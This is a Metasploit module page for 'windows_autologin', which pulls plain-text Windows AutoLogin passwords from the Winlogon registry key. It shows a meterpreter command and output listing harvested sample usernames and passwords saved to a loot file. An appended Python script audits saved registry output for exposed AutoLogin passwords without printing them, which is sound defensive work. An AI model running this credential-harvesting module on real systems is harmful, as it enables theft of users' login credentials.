[Metasploit] Post | Windows Gather AutoLogin User Credential Extractor


This module extracts the plain-text Windows user login password stored in the registry. It relies on a Windows feature (Windows 2K through the current Windows Seven) that lets a user or a third-party Windows utility configure user AutoLogin by writing the password in plain text to the (Alt)DefaultPassword field under the registry location HKLM\Software\Microsoft\Windows NT\WinLogon. This location is readable by all users.

meterpreter > run post/windows/gather/credentials/windows_autologin

[*] Running against John-PC @ session 1
[+] DefaultDomain=DEPT_SALES, DefaultUser=john, DefaultPassword=pa55w0rd
[+] AltDomain=DEPT_HR, AltUser=jack, AltPassword=dr0w55p
[*] Storing data...
[*] Windows AutoLogin User Credentials saved in: /root/.msf4/loot/20110821034449_default_10.23.12.11_windows.autologi_460131.txt
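
A defender-side check for the exposure described above, added here as an example (it is not part of the original post or of Metasploit): it parses saved `reg query` output for the Winlogon key and reports which AutoLogin password values are populated, without echoing the passwords. The sample input is constructed from the values in the run above and uses the full key path (with `CurrentVersion`) and the registry value names `DefaultUserName`, `DefaultDomainName` and their `Alt` counterparts; the function names are hypothetical.

```python
import re

# Winlogon value names that hold an AutoLogin password in clear text.
PASSWORD_VALUES = ("altdefaultpassword", "defaultpassword")

# One value line of `reg query` output: 4-space indent, name, type, optional data.
VALUE_LINE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_[A-Z_]+)(?: {4}(?P<data>.*))?$")


def parse_reg_query(text):
    """Return {lowercased value name: data} for the value lines in `reg query` output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:  # key header and blank lines do not match and are skipped
            values[m.group("name").lower()] = m.group("data") or ""
    return values


def audit_autologin(text):
    """Report populated password values; only the length is kept, never the secret."""
    values = parse_reg_query(text)
    findings = []
    for name in PASSWORD_VALUES:
        secret = values.get(name, "")
        if secret:  # an absent or empty value is not a finding
            prefix = "alt" if name.startswith("alt") else ""
            findings.append({"value": name,
                             "user": values.get(prefix + "defaultusername", ""),
                             "domain": values.get(prefix + "defaultdomainname", ""),
                             "password_length": len(secret)})
    return {"autologon_enabled": values.get("autoadminlogon") == "1",
            "findings": findings}


# Constructed sample shaped like `reg query` output, reusing the values from the run above.
SAMPLE = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    DEPT_SALES
    DefaultUserName    REG_SZ    john
    DefaultPassword    REG_SZ    pa55w0rd
    AltDefaultDomainName    REG_SZ    DEPT_HR
    AltDefaultUserName    REG_SZ    jack
    AltDefaultPassword    REG_SZ    dr0w55p
    Shell    REG_SZ    explorer.exe
"""

if __name__ == "__main__":
    print(audit_autologin(SAMPLE))
```

Any finding means the account's password should be treated as exposed to every local user of that machine and rotated once the value is removed.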
